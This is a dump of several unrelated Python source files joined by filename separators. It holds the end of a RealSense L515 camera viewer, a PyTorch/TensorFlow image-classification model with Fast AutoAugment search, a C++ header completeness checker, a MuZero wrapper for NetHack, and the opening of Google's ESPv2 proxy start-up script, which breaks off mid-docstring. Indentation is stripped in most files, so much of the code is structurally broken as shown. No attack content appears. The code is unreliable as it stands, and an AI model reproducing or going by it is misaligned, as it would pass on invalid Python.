        # Give the streaming thread a chance to leave its loop before shutting the pipeline down
        self.stream.join(timeout=2)
        print("Clean RS Camera")
        self.pipeline.stop()
        if not self.stream.is_alive(): print("Stream Killed")
if __name__ == "__main__":
l515 = L515()
l515.start_stream()
    mode = {0:'color', 1:'depth'}
    mode_idx = 0  # index into `mode`, toggled with the space bar
    while True:
        frame = l515.color_image if mode[mode_idx]=='color' else l515.depth_image
        cv2.imshow('Test', frame)
        key = cv2.waitKey(1)
        if key==ord('q'): break
        elif key==ord(' '): mode_idx = 1 - mode_idx
        else: continue
l515.stop_stream()
|
model.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import threading
import tensorflow as tf
import torch
import torchvision as tv
import numpy as np
import skeleton
from architectures.resnet import ResNet18
from skeleton.projects import LogicModel, get_logger
from skeleton.projects.others import NBAC, AUC
torch.backends.cudnn.benchmark = True
threads = [
threading.Thread(target=lambda: torch.cuda.synchronize()),
threading.Thread(target=lambda: tf.Session())
]
[t.start() for t in threads]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
LOGGER = get_logger(__name__)
class Model(LogicModel):
def __init__(self, metadata):
super(Model, self).__init__(metadata)
self.use_test_time_augmentation = False
def build(self):
base_dir = os.path.dirname(os.path.abspath(__file__))
in_channels = self.info['dataset']['shape'][-1]
num_class = self.info['dataset']['num_class']
# torch.cuda.synchronize()
LOGGER.info('[init] session')
[t.join() for t in threads]
self.device = torch.device('cuda', 0)
self.session = tf.Session()
LOGGER.info('[init] Model')
Network = ResNet18 # ResNet18 # BasicNet, SENet18, ResNet18
self.model = Network(in_channels, num_class)
self.model_pred = Network(in_channels, num_class).eval()
# torch.cuda.synchronize()
LOGGER.info('[init] weight initialize')
if Network in [ResNet18]:
model_path = os.path.join(base_dir, 'models')
LOGGER.info('model path: %s', model_path)
self.model.init(model_dir=model_path, gain=1.0)
else:
self.model.init(gain=1.0)
# torch.cuda.synchronize()
LOGGER.info('[init] copy to device')
self.model = self.model.to(device=self.device).half()
self.model_pred = self.model_pred.to(device=self.device).half()
self.is_half = self.model._half
# torch.cuda.synchronize()
LOGGER.info('[init] done.')
def update_model(self):
num_class = self.info['dataset']['num_class']
epsilon = min(0.1, max(0.001, 0.001 * pow(num_class / 10, 2)))
if self.is_multiclass():
self.model.loss_fn = torch.nn.BCEWithLogitsLoss(reduction='none')
# self.model.loss_fn = skeleton.nn.BinaryCrossEntropyLabelSmooth(num_class, epsilon=epsilon, reduction='none')
self.tau = 8.0
LOGGER.info('[update_model] %s (tau:%f, epsilon:%f)', self.model.loss_fn.__class__.__name__, self.tau, epsilon)
else:
self.model.loss_fn = torch.nn.CrossEntropyLoss(reduction='none')
# self.model.loss_fn = skeleton.nn.CrossEntropyLabelSmooth(num_class, epsilon=epsilon)
self.tau = 8.0
LOGGER.info('[update_model] %s (tau:%f, epsilon:%f)', self.model.loss_fn.__class__.__name__, self.tau, epsilon)
self.model_pred.loss_fn = self.model.loss_fn
self.init_opt()
LOGGER.info('[update] done.')
def init_opt(self):
steps_per_epoch = self.hyper_params['dataset']['steps_per_epoch']
batch_size = self.hyper_params['dataset']['batch_size']
params = [p for p in self.model.parameters() if p.requires_grad]
warmup_multiplier = 2.0
lr_multiplier = max(1.0, batch_size / 32)
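        # Linear LR scaling: the base LR of 0.025 grows with the batch size (reference batch 32)
        # and is divided by warmup_multiplier here, presumably so that gradual_warm_up can ramp it
        # back up over warm_up_epoch=5 epochs before the reduce-on-plateau schedule takes over.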
scheduler_lr = skeleton.optim.gradual_warm_up(
skeleton.optim.get_reduce_on_plateau_scheduler(
0.025 * lr_multiplier / warmup_multiplier,
patience=10, factor=.5, metric_name='train_loss'
),
warm_up_epoch=5,
multiplier=warmup_multiplier
)
self.optimizer = skeleton.optim.ScheduledOptimizer(
params,
torch.optim.SGD,
# skeleton.optim.SGDW,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.001 * 1 / 4,
nesterov=True
)
LOGGER.info('[optimizer] %s (batch_size:%d)', self.optimizer._optimizer.__class__.__name__, batch_size)
def adapt(self, remaining_time_budget=None):
epoch = self.info['loop']['epoch']
input_shape = self.hyper_params['dataset']['input']
height, width = input_shape[:2]
batch_size = self.hyper_params['dataset']['batch_size']
train_score = np.average([c['train']['score'] for c in self.checkpoints[-5:]])
valid_score = np.average([c['valid']['score'] for c in self.checkpoints[-5:]])
LOGGER.info('[adapt] [%04d/%04d] train:%.3f valid:%.3f',
epoch, self.hyper_params['dataset']['max_epoch'],
train_score, valid_score)
self.use_test_time_augmentation = self.info['loop']['test'] > 1
        # Adapt: apply Fast AutoAugment (FAA) policy search
if self.hyper_params['conditions']['use_fast_auto_aug'] and \
(train_score > 0.995 or self.info['terminate']) and \
remaining_time_budget > 120 and \
self.dataloaders['valid'] is not None and \
not hasattr(self, 'update_transforms'):
LOGGER.info('[adapt] search fast auto aug policy')
self.update_transforms = True
self.info['terminate'] = True
            # reset optimizer params
self.init_opt()
self.hyper_params['conditions']['max_inner_loop_ratio'] *= 3
self.hyper_params['conditions']['threshold_valid_score_diff'] = 0.00001
self.hyper_params['conditions']['min_lr'] = 1e-8
original_valid_policy = self.dataloaders['valid'].dataset.transform.transforms
original_train_policy = self.dataloaders['train'].dataset.transform.transforms
policy = skeleton.data.augmentations.autoaug_policy()
num_policy_search = 100
num_sub_policy = 3
num_select_policy = 3
searched_policy = []
for policy_search in range(num_policy_search):
selected_idx = np.random.choice(list(range(len(policy))), num_sub_policy)
selected_policy = [policy[i] for i in selected_idx]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
selected_policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device).half()
]
metrics = []
for policy_eval in range(num_sub_policy):
valid_dataloader = self.build_or_get_dataloader('valid', self.datasets['valid'], self.datasets['num_valids'])
# original_valid_batch_size = valid_dataloader.batch_sampler.batch_size
# valid_dataloader.batch_sampler.batch_size = batch_size
valid_metrics = self.epoch_valid(self.info['loop']['epoch'], valid_dataloader, reduction='max')
# valid_dataloader.batch_sampler.batch_size = original_valid_batch_size
metrics.append(valid_metrics)
loss = np.max([m['loss'] for m in metrics])
score = np.max([m['score'] for m in metrics])
LOGGER.info('[adapt] [FAA] [%02d/%02d] score: %f, loss: %f, selected_policy: %s',
policy_search, num_policy_search, score, loss, selected_policy)
searched_policy.append({
'loss': loss,
'score': score,
'policy': selected_policy
})
flatten = lambda l: [item for sublist in l for item in sublist]
policy_sorted_index = np.argsort([p['score'] for p in searched_policy])[::-1][:num_select_policy]
policy = flatten([searched_policy[idx]['policy'] for idx in policy_sorted_index])
policy = skeleton.data.augmentations.remove_duplicates(policy)
LOGGER.info('[adapt] [FAA] scores: %s',
[searched_policy[idx]['score'] for idx in policy_sorted_index])
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy
self.dataloaders['train'].dataset.transform.transforms = original_train_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device).half()
]
def activation(self, logits):
if self.is_multiclass():
logits = torch.sigmoid(logits)
prediction = (logits > 0.5).to(logits.dtype)
else:
logits = torch.softmax(logits, dim=-1)
_, k = logits.max(-1)
prediction = torch.zeros(logits.shape, dtype=logits.dtype, device=logits.device).scatter_(-1, k.view(-1, 1), 1.0)
return logits, prediction
def get_model_state(self):
return self.model.state_dict()
def epoch_train(self, epoch, train, model=None, optimizer=None):
model = model if model is not None else self.model
optimizer = optimizer if optimizer is not None else self.optimizer
model.train()
num_steps = len(train)
metrics = []
for step, (examples, labels) in enumerate(train):
if examples.shape[0] == 1:
examples = examples[0]
labels = labels[0]
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
# batch_size = examples.size(0)
# examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
# labels = torch.cat([labels, labels], dim=0)
skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = model(examples, labels, tau=self.tau)
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
# logits1, logits2 = torch.split(logits, batch_size, dim=0)
# logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits.float())
tpr, tnr, nbac = NBAC(prediction, original_labels.float())
auc = AUC(logits, original_labels.float())
score = auc if self.hyper_params['conditions']['score_type'] == 'auc' else float(nbac.detach().float())
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
LOGGER.debug(
'[train] [%02d] [%03d/%03d] loss:%.6f AUC:%.3f NBAC:%.3f tpr:%.3f tnr:%.3f, lr:%.8f',
epoch, step, num_steps, loss, auc, nbac, tpr, tnr,
optimizer.get_learning_rate()
)
train_loss = np.average([m['loss'] for m in metrics])
train_score = np.average([m['score'] for m in metrics])
optimizer.update(train_loss=train_loss)
return {
'loss': train_loss,
'score': train_score,
}
def epoch_valid(self, epoch, valid, reduction='avg'):
self.model.eval()
num_steps = len(valid)
metrics = []
tau = self.tau
for step, (examples, labels) in enumerate(valid):
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = self.model(examples, labels, tau=tau, reduction=reduction)
logits, prediction = self.activation(logits.float())
tpr, tnr, nbac = NBAC(prediction, original_labels.float())
auc = AUC(logits, original_labels.float())
score = auc if self.hyper_params['conditions']['score_type'] == 'auc' else float(nbac.detach().float())
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
LOGGER.debug(
'[valid] [%02d] [%03d/%03d] loss:%.6f AUC:%.3f NBAC:%.3f tpr:%.3f tnr:%.3f, lr:%.8f',
epoch, step, num_steps, loss, auc, nbac, tpr, tnr,
self.optimizer.get_learning_rate()
)
if reduction == 'avg':
valid_loss = np.average([m['loss'] for m in metrics])
valid_score = np.average([m['score'] for m in metrics])
elif reduction == 'max':
valid_loss = np.max([m['loss'] for m in metrics])
valid_score = np.max([m['score'] for m in metrics])
elif reduction == 'min':
valid_loss = np.min([m['loss'] for m in metrics])
valid_score = np.min([m['score'] for m in metrics])
else:
raise Exception('not support reduction method: %s' % reduction)
self.optimizer.update(valid_loss=np.average(valid_loss))
return {
'loss': valid_loss,
'score': valid_score,
}
def skip_valid(self, epoch):
LOGGER.debug('[valid] skip')
return {
'loss': 99.9,
'score': epoch * 1e-4,
}
def prediction(self, dataloader):
self.model_pred.eval()
epoch = self.info['loop']['epoch']
best_idx = np.argmax(np.array([c['valid']['score'] for c in self.checkpoints]))
best_loss = self.checkpoints[best_idx]['valid']['loss']
best_score = self.checkpoints[best_idx]['valid']['score']
tau = self.tau
states = self.checkpoints[best_idx]['model']
self.model_pred.load_state_dict(states)
LOGGER.info('best checkpoints at %d/%d (valid loss:%f score:%f) tau:%f',
best_idx + 1, len(self.checkpoints), best_loss, best_score, tau)
predictions = []
self.model_pred.eval()
for step, (examples, labels) in enumerate(dataloader):
# examples = examples[0]
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
batch_size = examples.size(0)
# Test-Time Augment flip
if self.use_test_time_augmentation:
examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
# skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits = self.model_pred(examples, tau=tau)
            # average
if self.use_test_time_augmentation:
logits1, logits2 = torch.split(logits, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits)
predictions.append(logits.detach().float().cpu().numpy())
        predictions = np.concatenate(predictions, axis=0).astype(np.float64)  # np.float was just an alias for the builtin float (float64) and is removed in newer NumPy
return predictions
|
cpp-header-checker.py
|
#!/usr/bin/env python
# Tool cpp-header-checker
#
# Copyright (C) 2022 Wang Qi (wqking)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import sys
import os
import glob
import argparse
import traceback
import threading
import queue
import tempfile
import random
import string
import time
import shutil
import codecs
import re
import pathlib
import shlex
def getRandomString(length) :
return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
def writeFile(fileName, content) :
with codecs.open(fileName, "w", "utf-8") as file :
file.write(str(content))
def readFile(fileName) :
with codecs.open(fileName, "r", "utf-8") as file :
return file.read()
def removeNthInclude(content, n) :
success = False
include = ''
def callback(m) :
nonlocal n, success, include
n -= 1
if n == -1 :
success = True
include = m.group(1)
return ''
else :
return m.group()
result = re.sub(r'(^\s*\#\s*include.*$)', callback, content, flags = re.M)
return result, success, include
def test_removeNthInclude() :
content = '''aaa
#include "abc.h"
bbb
#include <xyz/def.h>
ccc
'''
print(removeNthInclude(content, 0))
print(removeNthInclude(content, 1))
print(removeNthInclude(content, 2))
def isWindows() :
return sys.platform.startswith('win')
def normalizeCommand(command) :
return shlex.split(command, posix = not isWindows())
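# Illustrative example: on POSIX platforms normalizeCommand('gcc {file} -c -o {file}.o')
# yields ['gcc', '{file}', '-c', '-o', '{file}.o']; on Windows, posix=False keeps
# backslashes in paths intact instead of treating them as escapes.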
class TaskProcessor :
def __init__(self, app) :
self._app = app
self._tempPath = None
def initialize(self) :
self._tempPath = os.path.join(self._app.getTempPath(), self.getRandomFileName())
os.mkdir(self._tempPath)
def finalize(self) :
shutil.rmtree(self._tempPath)
def getApp(self) :
return self._app
def makeTempFileName(self, fileName) :
return os.path.join(self._tempPath, fileName)
def makeCommand(self, sourceFile) :
command = self._app.getCommand()
command = command.replace('{file}', sourceFile)
return command
def makeMainSourceCode(self, header) :
code = ''
code += '#include "%s"\n' % (header)
return code
def getRandomFileName(self, ext = None) :
fileName = '%s_%s_%s' % (
getRandomString(12),
str(threading.get_ident()),
str(int(time.time()))
)
if ext is not None :
fileName += ext
return fileName
def process(self, headerFile) :
header = os.path.abspath(headerFile)
self.doProcess(header)
    def doProcess(self, header) :
        pass
class CompleteHeaderProcessor(TaskProcessor) :
def __init__(self, app):
super().__init__(app)
def doProcess(self, header) :
mainFileName = self.getRandomFileName('.cpp')
fullMainFileName = self.makeTempFileName(mainFileName)
command = self.makeCommand(fullMainFileName)
writeFile(fullMainFileName, self.makeMainSourceCode(header))
result = subprocess.run(normalizeCommand(command), stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)
if result.returncode == 0 :
self.getApp().log('%s - OK' % (header))
else :
self.getApp().log('%s - ERROR\n%s' % (header, result.stdout))
self.getApp().error()
class RedundantHeaderProcessor(TaskProcessor) :
def __init__(self, app):
super().__init__(app)
def doProcess(self, header) :
headerContent = readFile(header)
includeIndexToRemove = 0
redundantIncludeList = []
while not self.getApp().shouldStop() :
content, success, include = removeNthInclude(headerContent, includeIndexToRemove)
if not success :
break
includeIndexToRemove += 1
newHeaderName = self.getRandomFileName('.h')
newFullHeaderName = os.path.join(str(pathlib.Path(header).parent.resolve()), newHeaderName)
writeFile(newFullHeaderName, content)
try :
mainFileName = self.getRandomFileName('.cpp')
fullMainFileName = self.makeTempFileName(mainFileName)
command = self.makeCommand(fullMainFileName)
writeFile(fullMainFileName, self.makeMainSourceCode(newFullHeaderName))
result = subprocess.run(normalizeCommand(command), stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)
if result.returncode == 0 :
include = include.replace('#include', '')
include = re.sub(r'[\"\'\<\>]', '', include)
include = include.strip()
redundantIncludeList.append(include)
finally:
os.unlink(newFullHeaderName)
if len(redundantIncludeList) == 0 :
self.getApp().log('%s - OK' % (header))
else :
            # Display the log after all #includes are checked; this makes it easier to look at the errors
self.getApp().log('%s - ERROR redundant: %s' % (header, ', '.join(redundantIncludeList)))
self.getApp().error()
class Application :
def __init__(self) :
self._sourcePatternList = []
self._excludePatterns = []
self._command = 'gcc {file} -c -o {file}.o'
self._tempPath = None
self._threads = None
self._stopOnError = 'yes'
self._queue = queue.Queue()
self._lock = threading.Lock()
self._processor = None
self._stopping = False
def getCommand(self) :
return self._command
def getTempPath(self) :
return self._tempPath
def log(self, message) :
with self._lock :
print(message)
def error(self) :
if self._stopOnError == 'yes' :
self._stopping = True
def shouldStop(self) :
return self._stopping
def run(self) :
if not self._parseCommandLine(sys.argv[1:]) :
return
self._processor.initialize()
try :
self._doRun()
except Exception as e:
traceback.print_exc()
finally :
self._processor.finalize()
def _doRun(self) :
for pattern in self._sourcePatternList :
fileList = glob.glob(pattern, recursive = True)
for file in fileList :
if self._canProcessFile(file) :
self._queue.put(file)
threadList = []
for i in range(self._threads) :
thread = threading.Thread(target = lambda : self._executeThread())
threadList.append(thread)
thread.start()
for thread in threadList :
thread.join()
def _executeThread(self) :
while not self.shouldStop() :
try :
task = self._queue.get(block = False)
            except queue.Empty :
task = None
if task is None :
break
self._doTask(task)
self._queue.task_done()
def _doTask(self, task) :
self._processor.process(task)
def _canProcessFile(self, file) :
for exclude in self._excludePatterns :
if exclude in file :
return False
return True
def _parseCommandLine(self, commandLineArguments) :
parser = argparse.ArgumentParser(add_help = False)
parser.add_argument('--help', action = 'store_true', help = 'Show help message')
parser.add_argument('-h', action = 'store_true', dest = 'help', help = 'Show help message')
parser.add_argument('--source', action = 'append', required = True, help = "The source file patterns, can have path and wildcard")
parser.add_argument(
'action',
nargs='?',
help = "The action, can be complete or redundant",
default = 'complete',
choices = [ 'complete', 'redundant' ]
)
parser.add_argument('--command', required = False, help = "The command to compile the sample cpp source file", default = self._command)
parser.add_argument('--temp', required = False, help = "Temporary directory. Default is the system temporary folder", default = None)
parser.add_argument('--exclude', action = 'append', required = False, help = "The patterns to exclude, can not have wildcard")
parser.add_argument('--threads', required = False, type = int, help = "Number of threads", default = None)
parser.add_argument(
'--stop-on-error',
required = False,
help = "Whether stop on first error, choices are auto/yes/no. 'auto' stops for action 'complete', not for 'redundant'",
default = 'auto',
choices = [ 'auto', 'yes', 'no' ]
)
if len(commandLineArguments) == 0 :
self._showUsage(parser)
return False
try :
options = parser.parse_args(commandLineArguments)
options = vars(options)
except :
self._showUsage(parser)
return False
if options['help'] :
self._showUsage(parser)
return False
self._sourcePatternList = options['source']
self._command = options['command']
self._tempPath = options['temp']
if self._tempPath is None :
self._tempPath = tempfile.gettempdir()
self._tempPath = os.path.join(self._tempPath, '') # append /
self._excludePatterns = options['exclude']
if self._excludePatterns is None :
self._excludePatterns = []
self._threads = options['threads']
if self._threads is None :
self._threads = os.cpu_count()
if self._threads is None or self._threads < 1 :
self._threads = 1
self._stopOnError = options['stop_on_error'].lower()
action = options['action']
if action == 'redundant' :
self._processor = RedundantHeaderProcessor(self)
if self._stopOnError == 'auto' :
self._stopOnError = 'no'
else :
self._processor = CompleteHeaderProcessor(self)
if self._stopOnError == 'auto' :
self._stopOnError = 'yes'
return True
def _showUsage(self, parser) :
parser.print_help()
Application().run()
|
nethack.py
|
import ctypes
import datetime
import os
import multiprocessing
import traceback
import gym
from .abstract_game import AbstractGame
from autoascend.env_wrapper import EnvWrapper
class MuZeroConfig:
def __init__(self, rl_model=None):
# More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization
self.seed = 0 # Seed for numpy, torch and the game
self.max_num_gpus = None # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use every GPU available
### Game
if rl_model is None:
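# Spin up a throwaway Game just to discover the RL model's observation/action spaces, then tear it down.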
game = Game()
game._kill_thread()
rl_model = game.rl_model
del game
if 'HACKDIR' in os.environ:
del os.environ['HACKDIR'] # nle leaves some leftover state that needs to be cleaned up
self.observation_shape = rl_model.observation_shape() # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)
self.action_space = list(range(len(rl_model.action_space))) # Fixed list of all possible actions. You should only edit the length
#self.observation_shape = (98, 1, 1)
#self.action_space = list(range(9))
self.players = list(range(1)) # List of players. You should only edit the length
self.stacked_observations = 0 # Number of previous observations and previous actions to add to the current observation
# Evaluate
self.muzero_player = 0 # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)
self.opponent = None # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, "random" or "expert" if implemented in the Game class
### Self-Play
self.num_workers = 40 # Number of simultaneous threads/workers self-playing to feed the replay buffer
self.selfplay_on_gpu = False
self.max_moves = 1e6 # Maximum number of moves if game is not finished before
self.num_simulations = 5 # Number of future moves self-simulated
self.discount = 0.997 # Chronological discount of the reward
self.temperature_threshold = None # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time
# Root prior exploration noise
self.root_dirichlet_alpha = 0.25
self.root_exploration_fraction = 0.25
# UCB formula
self.pb_c_base = 19652
self.pb_c_init = 1.25
### Network
self.network = "resnet" # "resnet" / "fullyconnected"
self.support_size = 300 # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))
# Residual Network
self.downsample = None # Downsample observations before representation network, False / "CNN" (lighter) / "resnet" (See paper appendix Network Architecture)
self.blocks = 8 # Number of blocks in the ResNet
self.channels = 128 # Number of channels in the ResNet
self.reduced_channels_reward = 256 # Number of channels in reward head
self.reduced_channels_value = 256 # Number of channels in value head
self.reduced_channels_policy = 256 # Number of channels in policy head
self.resnet_fc_reward_layers = [256, 256] # Define the hidden layers in the reward head of the dynamic network
self.resnet_fc_value_layers = [256, 256] # Define the hidden layers in the value head of the prediction network
self.resnet_fc_policy_layers = [256, 256] # Define the hidden layers in the policy head of the prediction network
# Fully Connected Network
self.encoding_size = 10
self.fc_representation_layers = [] # Define the hidden layers in the representation network
self.fc_dynamics_layers = [16] # Define the hidden layers in the dynamics network
self.fc_reward_layers = [16] # Define the hidden layers in the reward network
self.fc_value_layers = [] # Define the hidden layers in the value network
self.fc_policy_layers = [] # Define the hidden layers in the policy network
### Training
self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "checkpoints", os.path.basename(__file__)[:-3], datetime.datetime.now().strftime("%Y-%m-%d--%H-%M-%S")) # Path to store the model weights and TensorBoard logs (a leading '/' here would make os.path.join discard the script directory)
self.save_model = True # Save the checkpoint in results_path as model.checkpoint
self.training_steps = int(1000e3) # Total number of training steps (ie weights update according to a batch)
self.batch_size = 128 # Number of parts of games to train on at each training step
self.checkpoint_interval = int(1e3) # Number of training steps before using the model for self-playing
self.value_loss_weight = 0.25 # Scale the value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)
self.train_on_gpu = True #torch.cuda.is_available() # Train on GPU if available
self.optimizer = "Adam" # "Adam" or "SGD". Paper uses SGD
self.weight_decay = 1e-4 # L2 weights regularization
self.momentum = 0.9 # Used only if optimizer is SGD
# Exponential learning rate schedule
self.lr_init = 0.001 # Initial learning rate
self.lr_decay_rate = 0.1 # Set it to 1 to use a constant learning rate
self.lr_decay_steps = 350e3
### Replay Buffer
self.replay_buffer_size = 1e6 # Number of self-play games to keep in the replay buffer
self.num_unroll_steps = 5 # Number of game moves to keep for every batch element
self.td_steps = 10 # Number of steps in the future to take into account for calculating the target value
self.PER = True # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network
self.PER_alpha = 1 # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1
# Reanalyze (See paper appendix Reanalyse)
self.use_last_model_value = True # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)
self.reanalyse_on_gpu = False
### Adjust the self play / training ratio to avoid over/underfitting
self.self_play_delay = 0 # Number of seconds to wait after each played game
self.training_delay = 0 # Number of seconds to wait after each training step
self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it
def visit_softmax_temperature_fn(self, trained_steps):
"""
Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.
The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.
Returns:
Positive float.
"""
if trained_steps < 500e3:
return 1.0
elif trained_steps < 750e3:
return 0.5
else:
return 0.25
class Game(AbstractGame):
"""
Game wrapper.
"""
def __init__(self, seed=None):
self.rl_model = None
self.last_score = 0
self._start_thread()
self.current_legal_actions = list(range(len(self.rl_model.action_space)))
@staticmethod
def _create_env(seed, output_queue, input_queue, env=None):
if env is None:
env = gym.make('NetHackChallenge-v0')
env = EnvWrapper(env,
agent_args=dict(rl_model_to_train='fight2',
rl_model_training_comm=(output_queue, input_queue)))
if seed is not None:
env.env.seed(seed, seed)
return env
def _start_thread(self):
output_queue, input_queue = multiprocessing.Queue(), multiprocessing.Queue()
self.output_queue = output_queue
self.input_queue = input_queue
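# The env process first sends the rl_model over output_queue, then (observation, legal_actions, score) tuples;
# input_queue carries the chosen action back to it.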
def f():
try:
env = Game._create_env(None, output_queue, input_queue)
env.main()
except BaseException as e:
print(f'exception: {"".join(traceback.format_exception(None, e, e.__traceback__))}')
finally:
output_queue.put((None, None, None))
self.thread = multiprocessing.Process(target=f)
self.thread.start()
self.rl_model = self.output_queue.get()
def _kill_thread(self):
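# Despite the name, self.thread is a multiprocessing.Process. The async-exception call below only
# targets thread ids inside this interpreter, so the real cleanup is the terminate()/join() that follows.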
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(self.thread.ident,
ctypes.py_object(KeyboardInterrupt))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(self.thread.ident, 0)
raise RuntimeError('Exception raise failure')
self.thread.terminate()
self.thread.join()
def step(self, action):
"""
Apply action to the game.
Args:
action : action of the action_space to take.
Returns:
The new observation, the reward and a boolean if the game has ended.
"""
self.input_queue.put(action)
val = self.output_queue.get()
observation, self.current_legal_actions, score = val
if observation is None:
is_done = True
observation = self.rl_model.zero_observation()
score = self.last_score
else:
is_done = False
reward = score - self.last_score
self.last_score = score
return self.rl_model.encode_observation(observation), reward, is_done
def legal_actions(self):
"""
Should return the legal actions at each turn, if it is not available, it can return
the whole action space. At each turn, the game has to be able to handle one of the returned actions.
For complex game where calculating legal moves is too long, the idea is to define the legal actions
equal to the action space but to return a negative reward if the action is illegal.
Returns:
An array of integers, subset of the action space.
"""
return self.current_legal_actions
def reset(self):
"""
Reset the game for a new game.
Returns:
Initial observation of the game.
"""
while 1:
self._kill_thread()
self.last_score = 0
self._start_thread()
val = self.output_queue.get()
observation, self.current_legal_actions, score = val
self.last_score = score
if observation is not None:
break
return self.rl_model.encode_observation(observation)
def close(self):
"""
Properly close the game.
"""
self._kill_thread()
def render(self):
"""
Display the game observation.
"""
self.env.render()
input("Press enter to take a step ")
|
start_proxy.py
|
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
# The command to generate Envoy bootstrap config
BOOTSTRAP_CMD = "bin/bootstrap"
# Location of Config Manager and Envoy binary
CONFIGMANAGER_BIN = "bin/configmanager"
ENVOY_BIN = "bin/envoy"
# Health check period in secs, for Config Manager and Envoy.
HEALTH_CHECK_PERIOD = 60
# bootstrap config file will write here.
# By default, envoy writes some logs to /tmp too
# If root file system is read-only, this folder should be
# mounted from tmpfs.
DEFAULT_CONFIG_DIR = "/tmp"
# bootstrap config file name.
BOOTSTRAP_CONFIG = "/bootstrap.json"
# Default Listener port
DEFAULT_LISTENER_PORT = 8080
# Default backend
DEFAULT_BACKEND = "http://127.0.0.1:8082"
# Default rollout_strategy
DEFAULT_ROLLOUT_STRATEGY = "fixed"
# Google default application credentials environment variable
GOOGLE_CREDS_KEY = "GOOGLE_APPLICATION_CREDENTIALS"
# Flag defaults when running on serverless.
SERVERLESS_PLATFORM = "Cloud Run(ESPv2)"
SERVERLESS_XFF_NUM_TRUSTED_HOPS = 0
def gen_bootstrap_conf(args):
cmd = [BOOTSTRAP_CMD, "--logtostderr"]
cmd.extend(["--admin_port", str(args.status_port)])
if args.http_request_timeout_s:
cmd.extend(
["--http_request_timeout_s",
str(args.http_request_timeout_s)])
bootstrap_file = DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG
cmd.append(bootstrap_file)
print(cmd)
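# Illustrative example: with --status_port=8001 and no --http_request_timeout_s this builds
# ['bin/bootstrap', '--logtostderr', '--admin_port', '8001', '/tmp/bootstrap.json']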
return cmd
class ArgumentParser(argparse.ArgumentParser):
def error(self, message):
self.print_help(sys.stderr)
self.exit(1, '%s: error: %s\n' % (self.prog, message))
# Notes: These flags should get aligned with that of ESP at
# https://github.com/cloudendpoints/esp/blob/master/start_esp/start_esp.py#L420
def make_argparser():
parser = ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
ESPv2 start-up script. This script starts Config Manager and Envoy.
The service name and config ID are optional. If not supplied, the Config Manager
fetches the service name and the config ID from the metadata service as
attributes "service_name" and "service_config_id".
ESPv2 relies on the metadata service to fetch access tokens for Google
